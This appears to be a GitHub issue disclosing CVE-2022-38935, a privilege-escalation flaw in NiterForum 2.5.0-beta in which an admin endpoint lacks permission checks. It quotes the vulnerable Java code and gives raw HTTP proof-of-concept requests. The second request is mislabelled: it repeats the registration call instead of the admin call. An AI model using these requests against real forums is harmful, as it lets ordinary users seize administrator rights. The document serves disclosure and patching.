Headline
CVE-2022-38935: There is a vulnerability that can add the administrator account · Issue #25 · yourkevin/NiterForum
An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.
Vulnerability Details****Any registered user
code:
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83:
@ResponseBody//@ResponseBody返回json格式的数据
@RequestMapping(value = "/register", method = RequestMethod.POST)
public Object register(HttpServletRequest request,
@RequestParam("name") String name,
@RequestParam("password") String password,
@RequestParam("type") Integer type,
HttpServletResponse response) {
//1为手机号,2为邮箱号
ResultDTO resultDTO = (ResultDTO)userService.register(type,name,password);
if(200\==resultDTO.getCode()){
Cookie cookie = cookieUtils.getCookie("token",""+resultDTO.getData(),86400\*3);
response.addCookie(cookie);
}
return resultDTO;
}
Any user can add users through this interface
return:
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}
query database,successfully added:
Add administrator without authority
at
NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136:
@PostMapping("/user2588/setAdmin/id")
@ResponseBody
public Map<String,Object\> setQuestionById(HttpServletRequest request,
@RequestParam(name = "id",defaultValue = "0") Long id) {
UserDTO user = (UserDTO)request.getAttribute("loginUser");
//UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
if (user == null) {
throw new CustomizeException(CustomizeErrorCode.NO\_LOGIN);
}
Map<String,Object\> map = new HashMap<>();
UserAccount userAccount = new UserAccount();
userAccount.setGroupId(19);
UserAccountExample userAccountExample = new UserAccountExample();
userAccountExample.createCriteria().andUserIdEqualTo(id);
if(userAccountMapper.updateByExampleSelective(userAccount,userAccountExample)==1){
map.put("code",200);
map.put("message","恭喜您,设置成功!");
}
return map;
}
}
This interface does not perform permission verification, and any user can access it after logging in.
POC:****Any registered user
POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
[email protected]&password=123456&type=2
Add administrator without authority
POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
[email protected]&password=123456&type=2